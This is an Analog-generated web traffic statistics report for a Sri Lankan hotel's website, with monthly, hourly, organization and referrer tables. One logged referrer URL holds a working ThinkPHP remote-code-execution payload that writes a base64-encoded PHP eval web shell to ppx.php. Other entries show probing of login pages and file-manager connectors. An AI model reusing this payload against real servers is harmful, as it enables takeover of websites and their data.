<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet href="#internalStyle" type="text/css"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Web Server Statistics for firs.freudenbergleisure.com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="robots" content="noindex,nofollow" />
<meta name="generator" content="analog 6.0/Unix" />
<style type="text/css" id="internalStyle">
h2 {
	background-color: #A0C0F0;
	width: 98%;
	padding: 3px 6px;
}
table {
	text-align: right;
	margin-left: 30px;
	background-color: #D0E0F0;
	border-collapse: collapse;
}
th {
	border-bottom: 1px solid #404050;
	border-right: 1px dotted #606070;
	border-top: none;
	border-left: none;
	padding: 0px 5px 1px 5px;
	font-weight: bold;
	background-color: #A0C0F0;
}
td {
	padding: 0px 5px 1px 5px;
	border-right: 1px dotted #606070;
	border-left: none;
	border-bottom: none;
	border-top:none;
}
td.x {
	font-family: monospace;
	white-space: pre;
}
.xl {
	text-align: left;
	border-right: none;
}
.xr {
	text-align: right;
	border-right: none;
}
.bar {
	text-align: left;
	border-right: none;
}
tr.sub {background-color: #C0C0FF;
	font-style: italic;
}
.repdesc {
	font-style: italic;
}
.repspan {
	font-style: italic;
}
.goto {
	font-size: small;
}
.gensumtitle {
	font-weight: bold;
}
.gototitle {
	font-weight: bold;
}
.runtimetitle {
	font-weight: bold;
}
img {
	border-style: none;
}
a:link {
	color: blue;
	text-decoration: none;
}
a:visited {
	color: purple;
	text-decoration: none;
}
a:link:hover {
	text-decoration: underline;
}
a:visited:hover {
	text-decoration: underline;
}
a:link:active {
	color: red;
	text-decoration: underline;
}
a:visited:active {
	color: red;
	text-decoration: underline;
}
</style>
</head>
<body>
<div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://firs.freudenbergleisure.com/">firs.freudenbergleisure.com</a></h1>

<p class="analysisspan">Program started on Tue, Apr 30 2019 at  5:40 PM.
<br />Analyzed requests from Wed, Feb 28 2018 at 10:05 PM to Tue, Apr 30 2019 at  5:35 PM (425.81 days).</p>
</div>
<div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="lastseven">Figures in parentheses refer to the 7-day period ending Apr 30 2019 at  5:40 PM.</p>
<p class="gensumlines">
<span class="gensumtitle">Successful requests:</span> 82,353 (1,122)
<br /><span class="gensumtitle">Average successful requests per day:</span> 193 (160)
<br /><span class="gensumtitle">Successful requests for pages:</span> 25,527 (421)
<br /><span class="gensumtitle">Average successful requests for pages per day:</span> 59 (60)
<br /><span class="gensumtitle">Redirected requests:</span> 36,244 (156)
<br /><span class="gensumtitle">Distinct files requested:</span> 773 (3,586)
<br /><span class="gensumtitle">Distinct hosts served:</span> 10,208 (11,779)
<br /><span class="gensumtitle">Data transferred:</span> 2.42 gigabytes (34.05 megabytes)
<br /><span class="gensumtitle">Average data transferred per day:</span> 5.81 megabytes (4.86 megabytes)
</p>
</div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 100 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Feb 2018</td><td class="R">3</td><td class="P">0</td><td class="bar"></td></tr>
<tr><td class="x">Mar 2018</td><td class="R">4804</td><td class="P">539</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Apr 2018</td><td class="R">7214</td><td class="P">670</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">May 2018</td><td class="R">7847</td><td class="P">2194</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Jun 2018</td><td class="R">5687</td><td class="P">1769</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Jul 2018</td><td class="R">5366</td><td class="P">1589</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr>
<tr><td class="x">Aug 2018</td><td class="R">5335</td><td class="P">1760</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Sep 2018</td><td class="R">4816</td><td class="P">1665</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Oct 2018</td><td class="R">4947</td><td class="P">1447</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Nov 2018</td><td class="R">3662</td><td class="P">1265</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Dec 2018</td><td class="R">5286</td><td class="P">2014</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">&nbsp;</td><td class="R">&nbsp;</td><td class="P">&nbsp;</td><td class="bar">&nbsp;</td></tr>
<tr><td class="x">Jan 2019</td><td class="R">8355</td><td class="P">3394</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Feb 2019</td><td class="R">6927</td><td class="P">3011</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Mar 2019</td><td class="R">6480</td><td class="P">2260</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Apr 2019</td><td class="R">5624</td><td class="P">1950</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
</tbody></table>
<p class="busiesttime">Busiest month: Jan 2019 (3,394 requests for pages).</p>
</div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 100 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x">Sun</td><td class="R">10392</td><td class="P">3053</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Mon</td><td class="R">11303</td><td class="P">3573</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">Tue</td><td class="R">12648</td><td class="P">3635</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Wed</td><td class="R">13553</td><td class="P">4151</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">Thu</td><td class="R">12314</td><td class="P">3856</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Fri</td><td class="R">11988</td><td class="P">3868</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">Sat</td><td class="R">10155</td><td class="P">3391</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
</tbody></table>
</div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 40 requests for pages or part thereof.</p>
<table>
<thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar">&nbsp;</th></tr></thead>
<tbody><tr><td class="x"> 0</td><td class="R">2490</td><td class="P">928</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x"> 1</td><td class="R">2726</td><td class="P">879</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 2</td><td class="R">2683</td><td class="P">874</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x"> 3</td><td class="R">2838</td><td class="P">913</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 4</td><td class="R">2130</td><td class="P">796</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x"> 5</td><td class="R">2122</td><td class="P">825</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 6</td><td class="R">2543</td><td class="P">913</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 7</td><td class="R">2814</td><td class="P">966</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 8</td><td class="R">3309</td><td class="P">997</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x"> 9</td><td class="R">3592</td><td class="P">1092</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr>
<tr><td class="x">10</td><td class="R">5234</td><td class="P">1363</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">11</td><td class="R">4083</td><td class="P">1328</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">12</td><td class="R">4697</td><td class="P">1456</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">13</td><td class="R">4413</td><td class="P">1241</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr>
<tr><td class="x">14</td><td class="R">4489</td><td class="P">1284</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">15</td><td class="R">4431</td><td class="P">1299</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">16</td><td class="R">4153</td><td class="P">1170</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">17</td><td class="R">3267</td><td class="P">1073</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">18</td><td class="R">3913</td><td class="P">1044</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">19</td><td class="R">3166</td><td class="P">950</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr>
<tr><td class="x">20</td><td class="R">3484</td><td class="P">1073</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr>
<tr><td class="x">21</td><td class="R">3312</td><td class="P">1026</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">22</td><td class="R">3347</td><td class="P">1011</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
<tr><td class="x">23</td><td class="R">3117</td><td class="P">1026</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr>
</tbody></table>
</div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./dom.png" alt="" /></p>
<p class="whatinc">
Listing domains, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead>
<tbody><tr><td class="R">80361</td><td class="b">97.03%</td><td class="xl">[unresolved numerical addresses]</td></tr>
<tr><td class="R">1992</td><td class="b"> 2.97%</td><td class="xl">[domain not given]</td></tr>
</tbody></table>
</div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./org.png" alt="" /></p>
<p class="whatinc">
Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead>
<tbody><tr><td class="R">15291</td><td class="b">19.55%</td><td class="xl">10</td></tr>
<tr><td class="R">14135</td><td class="b">16.32%</td><td class="xl">162.158</td></tr>
<tr><td class="R">11563</td><td class="b">12.86%</td><td class="xl">172.68</td></tr>
<tr><td class="R">7271</td><td class="b">10.11%</td><td class="xl">172.31</td></tr>
<tr><td class="R">5006</td><td class="b"> 6.15%</td><td class="xl">108</td></tr>
<tr><td class="R">3928</td><td class="b"> 4.01%</td><td class="xl">172.69</td></tr>
<tr><td class="R">2730</td><td class="b"> 3.12%</td><td class="xl">141.101</td></tr>
<tr><td class="R">2004</td><td class="b"> 2.48%</td><td class="xl">66.249</td></tr>
<tr><td class="R">1992</td><td class="b"> 2.97%</td><td class="xl">[domain not given]</td></tr>
<tr><td class="R">905</td><td class="b"> 1.05%</td><td class="xl">173.245</td></tr>
<tr><td class="R">905</td><td class="b"> 1.08%</td><td class="xl">112</td></tr>
<tr><td class="R">781</td><td class="b"> 0.93%</td><td class="xl">18</td></tr>
<tr><td class="R">622</td><td class="b"> 1.01%</td><td class="xl">40</td></tr>
<tr><td class="R">596</td><td class="b"> 0.77%</td><td class="xl">207.46</td></tr>
<tr><td class="R">567</td><td class="b"> 0.70%</td><td class="xl">157.55</td></tr>
<tr><td class="R">556</td><td class="b"> 0.72%</td><td class="xl">138.197</td></tr>
<tr><td class="R">507</td><td class="b"> 0.53%</td><td class="xl">123</td></tr>
<tr><td class="R">467</td><td class="b"> 0.51%</td><td class="xl">46</td></tr>
<tr><td class="R">386</td><td class="b"> 0.47%</td><td class="xl">124</td></tr>
<tr><td class="R">338</td><td class="b"> 0.34%</td><td class="xl">103</td></tr>
<tr><td class="R">11803</td><td class="b">14.32%</td><td class="xl">[not listed: 480 organizations]</td></tr>
</tbody></table>
</div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./redirref.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring URLs by the number of redirected requests, sorted by the number of redirected requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead>
<tbody><tr><td class="R">1380</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/css/firs_main.css">https://firs.freudenbergleisure.com/assets/css/firs_main.css</a></td></tr>
<tr><td class="R">1210</td><td class="xl"><a href="https://firs.freudenbergleisure.com/contact-us">https://firs.freudenbergleisure.com/contact-us</a></td></tr>
<tr><td class="R">723</td><td class="xl"><a href="http://www.firs.lk/">http://www.firs.lk/</a></td></tr>
<tr><td class="R">513</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/lobby-home.html">https://firs.freudenbergleisure.com/assets/360/lobby-home.html</a></td></tr>
<tr><td class="R">338</td><td class="xl"><a href="https://firs.freudenbergleisure.com/accommodation">https://firs.freudenbergleisure.com/accommodation</a></td></tr>
<tr><td class="R">257</td><td class="xl"><a href="http://www.google.com.hk/">http://www.google.com.hk/</a></td></tr>
<tr><td class="R">183</td><td class="xl"><a href="https://firs.freudenbergleisure.com/location">https://firs.freudenbergleisure.com/location</a></td></tr>
<tr><td class="R">161</td><td class="xl"><a href="https://firs.freudenbergleisure.com/">https://firs.freudenbergleisure.com/</a></td></tr>
<tr><td class="R">129</td><td class="xl"><a href="https://sucuri.net/">https://sucuri.net/</a></td></tr>
<tr><td class="R">123</td><td class="xl"><a href="https://www.google.com/url/">https://www.google.com/url/</a></td></tr>
<tr class="sub level2"><td class="R">123</td><td class="xl">&nbsp;&nbsp;<a href="https://www.google.com/url/?sa=t">https://www.google.com/url/?sa=t</a></td></tr>
<tr><td class="R">109</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/reinhart_room-home.html">https://firs.freudenbergleisure.com/assets/360/reinhart_room-home.html</a></td></tr>
<tr><td class="R">106</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/molly_suite-home.html">https://firs.freudenbergleisure.com/assets/360/molly_suite-home.html</a></td></tr>
<tr><td class="R">102</td><td class="xl"><a href="http://firs.lk/wp-login.php">http://firs.lk/wp-login.php</a></td></tr>
<tr><td class="R">98</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/360/stephan_suite-home.html">https://firs.freudenbergleisure.com/assets/360/stephan_suite-home.html</a></td></tr>
<tr><td class="R">93</td><td class="xl"><a href="http://thefirsnuwaraeliya.com/wp-login.php">http://thefirsnuwaraeliya.com/wp-login.php</a></td></tr>
<tr><td class="R">89</td><td class="xl"><a href="http://www.thefirsnuwaraeliya.com/">http://www.thefirsnuwaraeliya.com/</a></td></tr>
<tr><td class="R">72</td><td class="xl"><a href="http://firs.lk/">http://firs.lk/</a></td></tr>
<tr><td class="R">66</td><td class="xl"><a href="https://firs.freudenbergleisure.com/facilities">https://firs.freudenbergleisure.com/facilities</a></td></tr>
<tr><td class="R">51</td><td class="xl"><a href="https://firs.freudenbergleisure.com/privacy-policy">https://firs.freudenbergleisure.com/privacy-policy</a></td></tr>
<tr><td class="R">50</td><td class="xl"><a href="https://firs.freudenbergleisure.com/facilities/room-service">https://firs.freudenbergleisure.com/facilities/room-service</a></td></tr>
<tr><td class="R">48</td><td class="xl"><a href="https://firs.freudenbergleisure.com/terms-and-conditions">https://firs.freudenbergleisure.com/terms-and-conditions</a></td></tr>
<tr><td class="R">45</td><td class="xl"><a href="http://www.firs.lk/ppx.php">http://www.firs.lk/ppx.php</a></td></tr>
<tr><td class="R">29</td><td class="xl"><a href="http://thefirsnuwaraeliya.com/">http://thefirsnuwaraeliya.com/</a></td></tr>
<tr><td class="R">29</td><td class="xl"><a href="https://firs.freudenbergleisure.com/assets/css/jquery-ui.css">https://firs.freudenbergleisure.com/assets/css/jquery-ui.css</a></td></tr>
<tr><td class="R">25</td><td class="xl"><a href="http://www.firs.lk/robots.txt">http://www.firs.lk/robots.txt</a></td></tr>
<tr><td class="R">22</td><td class="xl"><a href="http://lankaemarketing.benchurl.com/c/l">http://lankaemarketing.benchurl.com/c/l</a></td></tr>
<tr class="sub level2"><td class="R">22</td><td class="xl">&nbsp;&nbsp;<a href="http://lankaemarketing.benchurl.com/c/l?u=7C7B462&amp;e=CB1AD7&amp;c=B87C1&amp;t=0&amp;l=7542F8BC&amp;email=Y5HKcyiHEpT5ClH5dioJYEyPBhzqZXIgBJcAT8xErqg%3D&amp;seq=2">http://lankaemarketing.benchurl.com/c/l?u=7C7B462&amp;e=CB1AD7&amp;c=B87C1&amp;t=0&amp;l=7542F8BC&amp;email=Y5HKcyiHEpT5ClH5dioJYEyPBhzqZXIgBJcAT8xErqg%3D&amp;seq=2</a></td></tr>
<tr><td class="R">18</td><td class="xl"><a href="http://thefirsnuwaraeliya.com/user/login">http://thefirsnuwaraeliya.com/user/login</a></td></tr>
<tr><td class="R">16</td><td class="xl"><a href="http://firs.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php">http://firs.freudenbergleisure.com/sites/all/libraries/elfinder/src/connectors/php/connector.php</a></td></tr>
<tr><td class="R">15</td><td class="xl"><a href="http://www.firs.lk/index.php/">http://www.firs.lk/index.php/</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="xl">&nbsp;&nbsp;<a href="http://www.firs.lk/index.php/?s=index/%5C%5Cthink%5C%5CContainer/invokefunction&amp;function=assert&amp;vars%5B0%5D=phpinfo%28%29.fputs%28fopen%28%27ppx.php%27,%27w%27%29,base64_decode%28%27Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4=%27%29%29">http://www.firs.lk/index.php/?s=index/\\think\\Container/invokefunction&amp;function=assert&amp;vars[0]=phpinfo().fputs(fopen('ppx.php','w'),base64_decode('Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4='))</a></td></tr>
<tr><td class="R">15</td><td class="xl"><a href="http://www.firs.lk/install/index.php.bak">http://www.firs.lk/install/index.php.bak</a></td></tr>
<tr><td class="R">1436</td><td class="xl">[not listed: 720 URLs]</td></tr>
</tbody></table>
</div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Referring Site Report | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
<p><img src="./refsite.png" alt="" /></p>
<p class="whatinc">
Listing the top 30 referring sites by the number of requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead>
<tbody><tr><td class="R">16637</td><td class="xl">http://www.firs.lk/</td></tr>
<tr><td class="R">16376</td><td class="xl">https://firs.freudenbergleisure.com/</td></tr>
<tr><td class="R">2928</td><td class="xl">http://firs.lk/</td></tr>
<tr><td class="R">1754</td><td class="xl">http://www.thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">1609</td><td class="xl">https://www.google.com/</td></tr>
<tr><td class="R">1363</td><td class="xl">http://thefirsnuwaraeliya.com/</td></tr>
<tr><td class="R">1329</td><td class="xl">https://www.google.lk/</td></tr>
<tr><td class="R">463</td><td class="xl">http://www.freudenbergleisure.com/</td></tr>
<tr><td class="R">413</td><td class="xl">https://sucuri.net/</td></tr>
